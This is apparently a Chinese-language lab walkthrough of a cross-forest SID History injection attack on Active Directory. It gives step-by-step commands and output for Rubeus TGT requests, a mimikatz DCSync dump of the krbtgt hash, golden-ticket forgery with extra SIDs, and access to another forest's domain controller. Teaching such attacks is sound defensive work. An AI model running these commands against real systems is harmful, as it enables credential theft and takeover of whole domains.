跨林攻击-SID History注入
SID History注入攻击,也称为 SID 劫持,是一种利用 Active Directory 用户帐户的 SID(安全标识符)历史属性来提升权限的技术。当用户帐户从一个域迁移到不同林中的另一个域时,其 SID 历史属性会保留来自先前域的 SID。
sidHistory 属性用于迁移场景。如果一个域中的用户迁移到另一个域,则会在第二个域中创建一个新帐户。原始用户的 SID 将被添加到新用户的 SID 历史记录属性中,以确保该用户仍然可以访问原始域中的资源。
在两个林之间启用 SID history 的情况下,可能会发生 extra-SIDs 攻击,但林间默认启用SID filtering(RID小于 1000 的 SID 会被过滤掉,只能利用RID 1000以上的)
1. 案例演示
1.1. 高权限迁移用户
假设名为 Sentinal 的用户已从 logistics.ad 域迁移到 inlanefreight.ad 域。尽管 Sentinal 在 inlanefreight.ad 域中被赋予了常规的 Domain Users 权限,但其 SID 历史记录仍然保留自之前的域成员身份,当时 Sentinal 是 Infrastructure 组的成员。而 Infrastructure 组作为 Administrators 组的成员,拥有更高的权限。
1.1.1. 枚举已启用 SID 历史记录的用户
PS C:\Tools> Get-ADUser -Filter "SIDHistory -Like '*'" -Properties SIDHistory
DistinguishedName : CN=sentinal,CN=Users,DC=inlanefreight,DC=ad
Enabled : True
GivenName : sentinal
Name : sentinal
ObjectClass : user
ObjectGUID : a0304e33-8f23-4020-bd7e-78abe1fe0649
SamAccountName : sentinal
SID : S-1-5-21-2432454459-173448545-3375717855-2601
SIDHistory : {S-1-5-21-186204973-2882451676-2899969076-2602}Surname :
UserPrincipalName : sentinal@inlanefreight.ad
- 用户
sentinal存在SIDHistory 属性,因为其是从logistics流域迁移到inlanefreight域的
1.1.2. 重置用户密码
因为我们不知道这个用户密码,。但他是属于当前域的。我们可以重置其密码
PS C:\Tools net user sentinal sentinal
The command completed successfully.
1.1.3. Rubeus 创建一个牺牲登录会话
PS C:\Tools> ./Rubeus createnetonly /program:powershell.exe /show
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.3
[*] Action: Create Process (/netonly)
[*] Using random username and password.
[*] Showing process : True
[*] Username : FLTNQYMI
[*] Domain : YH4TURBL
[*] Password : KNNI2TMI
[+] Process : 'powershell.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4752
[+] LUID : 0x52dacc
1.1.4. 使用 Rubeus 请求 TGT
PS C:\Tools> .\Rubeus.exe asktgt /user:sentinal /password:sentinal /domain:inlanefreight.ad /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'inlanefreight.ad\sentinal'
[*] Using domain controller: fe80::29f4:c79f:56c1:ae29%6:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFajCCBWagAwIBBaEDAgEWooIEczCCBG9hggRrMIIEZ6ADAgEFoRIbEElOTEFORUZSRUlHSFQuQUSiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEGlubGFuZWZyZWlnaHQuYWSjggQjMIIEH6ADAgESoQMCAQKiggQRBIIEDfulYP/JrkPSD4dn96fit0AOo7bgf3UFZJN8mrwnkEfLc0IjyWrBA3mRvzjjU5O8XbITkOrGHnmy
...[SNIP]...
dGluYWyjBwMFAEDhAAClERgPMjAyNDAzMjQxNzU2MjlaphEYDzIwMjQwMzI1MDM1NjI5WqcRGA8yMDI0MDMzMTE3NTYyOVqoEhsQSU5MQU5FRlJFSUdIVC5BRKklMCOgAwIBAqEcMBobBmtyYnRndBsQaW5sYW5lZnJlaWdodC5hZA==
[+] Ticket successfully imported!
ServiceName : krbtgt/inlanefreight.ad
ServiceRealm : INLANEFREIGHT.AD
UserName : sentinal
UserRealm : INLANEFREIGHT.AD
StartTime : 3/24/2024 10:56:29 AM
EndTime : 3/24/2024 8:56:29 PM
RenewTill : 3/31/2024 10:56:29 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : nyNcm7wPMp3K1cfz1ok7Ug==
ASREP (key) : 58A478135A93AC3BF058A5EA0E8FDB71
1.1.5. PSSession访问DC02
PS C:\Tools> Enter-PSSession DC02.logistics.ad
[DC02.logistics.ad]: PS C:\Users\sentinal\Documents> hostname;whoami
DC02
inlanefreight\sentinal
1.2. 低权限迁移用户(SID注入)
如果当前用户的权限比较低,我们可以将高权限用户的 SID 注入到现有用户帐户中,利用残留的 SID 关联来提升域内的权限
要识别已启用 SID History 的林,可以检查 TrustAttributes 属性中是否存在 TREAT_AS_EXTERNAL 标志。如果存在此值,则表示该林已启用 SID History
1.2.1. 枚举 SID 历史记录
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainTrust -domain logistics.ad
SourceName : logistics.ad
TargetName : inlanefreight.ad
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : TREAT_AS_EXTERNAL,FOREST_TRANSITIVETrustDirection : Bidirectional
WhenCreated : 12/26/2023 4:13:40 PM
WhenChanged : 3/13/2024 1:02:44 PM
- 目标有
TREAT_AS_EXTERNAL标志,启用了SIDHistory
如果 logistics 和 inlanefreight 域之间启用了 SID 历史记录,则可能出现 Extrasids 攻击。这种攻击涉及将 logistics 域中高权限组或用户的 SID 注入到 inlanefreight 域中的任何用户对象中。需要特别注意的是,跨林信任关系通常默认启用 SID Filtering ,该过滤会限制仅接受相对标识符 (RID) 大于 1000 SID。
1.2.2. 获取高权限用户SID
我们可以使用BloodHound来收集具有高权限组的SID,且其RID大于1000的
这里发现 Infrastructure 组是一个高权限组,其 RID 为 2602,,我们可以将 Infrastructure 组的 SID 注入到 Inlanefright 域中的任何用户对象中,例如 inlanefreight\jimmy ,从而有可能导致权限提升或者未授权访问
1.2.3. 执行SID 注入攻击(extra-SIDs)
需要的条件:
- 当前域的 KRBTGT 哈希值
- 当前域的 SID
- 当前域的 FQDN
- 目标域的高权限组的 SID 这里为
Infrastructure
1.2.4. 获取当前域的 krbtgt 哈希值
这里用mimikatz
PS C:\Tools> .\mimikatz.exe "lsadump::dcsync /user:INLANEFREIGHT\krbtgt" exit
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /user:INLANEFREIGHT\krbtgt
[DC] 'inlanefreight.ad' will be the domain
[DC] 'DC01.inlanefreight.ad' will be the DC server
[DC] 'INLANEFREIGHT\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 12/26/2023 8:38:43 AM
Object Security ID : S-1-5-21-2432454459-173448545-3375717855-502
Object Relative ID : 502
Credentials:
Hash NTLM: 119885a9af438d1ef0d7543bed8b9ea1
ntlm- 0: 119885a9af438d1ef0d7543bed8b9ea1
lm - 0: 6c3a4fff93ba201c4ae9735c68e93e47
1.2.5. 获取当前域的 SID
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainSID
S-1-5-21-2432454459-173448545-3375717855
1.2.6. 获取Infrastructure组的 SID
PS C:\Tools> Get-ADGroup -Identity "Infrastructure" -Server "logistics.ad"
DistinguishedName : CN=Infrastructure,CN=Users,DC=logistics,DC=ad
GroupCategory : Security
GroupScope : Universal
Name : Infrastructure
ObjectClass : group
ObjectGUID : fe42a45c-a42c-4945-98ca-57446ab9430a
SamAccountName : Infrastructure
SID : S-1-5-21-186204973-2882451676-2899969076-2602
1.2.7. 使用Rubeus伪造黄金票据
PS C:\Tools> .\Rubeus.exe golden /rc4:119885a9af438d1ef0d7543bed8b9ea1 /domain:inlanefreight.ad /sid:S-1-5-21-2432454459-173448545-3375717855 /sids:S-1-5-21-186204973-2882451676-2899969076-2602 /user:jimmy /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Build TGT
[*] Building PAC
[*] Domain : INLANEFREIGHT.AD (INLANEFREIGHT)
[*] SID : S-1-5-21-2432454459-173448545-3375717855
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ExtraSIDs : S-1-5-21-186204973-2882451676-2899969076-2602
[*] ServiceKey : 119885A9AF438D1EF0D7543BED8B9EA1
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 119885A9AF438D1EF0D7543BED8B9EA1
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : krbtgt
[*] Target : inlanefreight.ad
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'jimmy@inlanefreight.ad'
[*] AuthTime : 3/28/2024 3:34:15 PM
[*] StartTime : 3/28/2024 3:34:15 PM
[*] EndTime : 3/29/2024 1:34:15 AM
[*] RenewTill : 4/4/2024 3:34:15 PM
[*] base64(ticket.kirbi):
doIFSzCCBUegAwIBBaEDAgEWooIERDCCBEBhggQ8MIIEOKADAgEFoRIbEElOTEFORUZSRUlHSFQuQUSi
JTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEGlubGFuZWZyZWlnaHQuYWSjggP0MIID8KADAgEXoQMCAQOiggPi
BIID3pLWOBjELBbJ5YwjnGyTBZdNnf81mx7jr4gkJ63wj/oALuI2LIYXxus8uXh5ZRgFwvXO19a2ZTuk
rTj5XB9Sl+XsuX4hfClIWmQ5dobP+VxyWoKhpXk+k9KfdeuxYl3Ell3S9iI+GkbsNR22+PkIRDQBBG4+
1D2IOOtUMz3fOKdtyZ/TTY4DleBqabp9FpfpLbUazqMYg8ZFr63bEmVal47hUQKpbJkPJcOrspWMp8Uh
ao0f7YfB33DB7D6ARzAl50OPnaUvqGvssnluNu7ILyrPAy7qK0MNfaONkQm+GtRvIdfwMr1VSWUp6HmX
Vr7n5SFFumQvMurtRMG2ac3jCJw78/DD8vkRIxcnwDbE/64A/KNRA9RsldlMys5xILL6C9U9N4ETkSgS
hz+E3YpWxu8XnEHqedgJV6rvN/Nu2BiQGdyQOQmAZBah7HO4tlt52fEUrhA8nKCT3Ch0P8aGGg72t4hD
+4HUVuDDk4v86D4n5Fkw8DMLzrHbHmX/5wmp/rERO5rej4d+rK8if6R2GgTl+f98p7Vif5XoIvjy8T6E
fHoJDT7xZzheKa8fY8eqgxbEbQ2wPlYOToHVvcenWJDnDSZraYdJM4vGRL++7By4/pELj93mYiUwsGeT
NqI6vUG29inBzLlArln0AbE8g0Oh+Y6d+/hvFluwJBBY50EoFhqMYCEjJ8FsxggCkxsuNxyWshNQChuQ
YNnmrhAYUDnyJnGYHhXp+N/AngQ1ajJm3vxcBuIGRZSKYT6k1SNcEHypqEcv8GFGrTQM6nYhjdcBxyH8
tMyRfOs20phvGi6Vu7zCfnsYHkRZDs9vrdWxw5lApxqBXBTlC5JEtM/Xx/A0n8PMDhzwcrnov5WuyXWV
jIsZB9UrvEUV84ZC3brvGxYFCEXVeRXnLuG3j4mGcyDgp+KF70a+vgCQGRIQ03Eb/qPb0QLaSJtoUSIX
ASZ3AfPfQlGCJ+mrTjnx3FZJHoGoxkN+leqze1OARzQwrUOIkZ00iEsuUHHShZjqxQJ1R2r/Dbpm0vHX
4ZyszFIlaZ4B1sD9J8Q5nHSGiATILCFZcX2imh4jBUIvwKJvehkyXEHOsJkIYDJwZRYilOKU5bPnMlyK
ifjs4YDGcHX+nQIz5+GMMNkuQUH9KeXPYzMtlMgc/aUWoMYHahVwTM8Nfv1/eH6S/LsvmDHtwQNBsIEl
W7wB/Zyn0oxdVRbf/8wF6gsaCtcMPk5sXpcZoVPasCeLhV69bU7MB0whKtGWFQSPDfNFk7sRQPaJvz+E
+HupyRh0wBt5boTkfFuf2GA8UJWNVcnK/RS/o3aGXHZH4qOB8jCB76ADAgEAooHnBIHkfYHhMIHeoIHb
MIHYMIHVoBswGaADAgEXoRIEEFSbJ0PiKIRFSgugsVjxT/uhEhsQSU5MQU5FRlJFSUdIVC5BRKISMBCg
AwIBAaEJMAcbBWppbW15owcDBQBA4AAApBEYDzIwMjQwMzI4MjIzNDE1WqURGA8yMDI0MDMyODIyMzQx
NVqmERgPMjAyNDAzMjkwODM0MTVapxEYDzIwMjQwNDA0MjIzNDE1WqgSGxBJTkxBTkVGUkVJR0hULkFE
qSUwI6ADAgECoRwwGhsGa3JidGd0GxBpbmxhbmVmcmVpZ2h0LmFk
[+] Ticket successfully imported!
1.2.8. mimikatz伪造黄金票据
C:\Tools> mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # kerberos::golden /user:jimmy /domain:inlanefreight.ad /sid:S-1-5-21-2432454459-173448545-3375717855 /sids:S-1-5-21-186204973-2882451676-2899969076-2602 /krbtgt:119885a9af438d1ef0d7543bed8b9ea1 /ptt
User : jimmy
Domain : inlanefreight.ad (INLANEFREIGHT)
SID : S-1-5-21-2432454459-173448545-3375717855
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-186204973-2882451676-2899969076-2602 ;
ServiceKey: 119885a9af438d1ef0d7543bed8b9ea1 - rc4_hmac_nt
Lifetime : 3/28/2024 3:41:08 PM ; 3/26/2034 3:41:08 PM ; 3/26/2034 3:41:08 PM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'jimmy @ inlanefreight.ad' successfully submitted for current session
PS C:\Tools> klist
Current LogonId is 0:0x5126a
Cached Tickets: (1)
#0> Client: jimmy @ INLANEFREIGHT.AD
Server: krbtgt/inlanefreight.ad @ INLANEFREIGHT.ADKerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 3/28/2024 15:34:15 (local)
End Time: 3/29/2024 1:34:15 (local)
Renew Time: 4/4/2024 15:34:15 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
该票证在 Logistics 域内具有 Infrastructure 组的 extra-sid,可以用来跨林访问
1.2.9. 访问 DC02
PS C:\Tools> dir \\DC02.logistics.ad\c$
Directory: \\DC02.logistics.ad\c$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/20/2024 1:44 PM FSP_Flag
d----- 7/16/2016 6:23 AM PerfLogs
d-r--- 3/24/2024 10:47 AM Program Files
d----- 7/16/2016 6:23 AM Program Files (x86)
d----- 3/28/2024 1:31 PM Tools
d-r--- 12/26/2023 7:21 AM Users
d----- 12/26/2023 7:40 AM Windows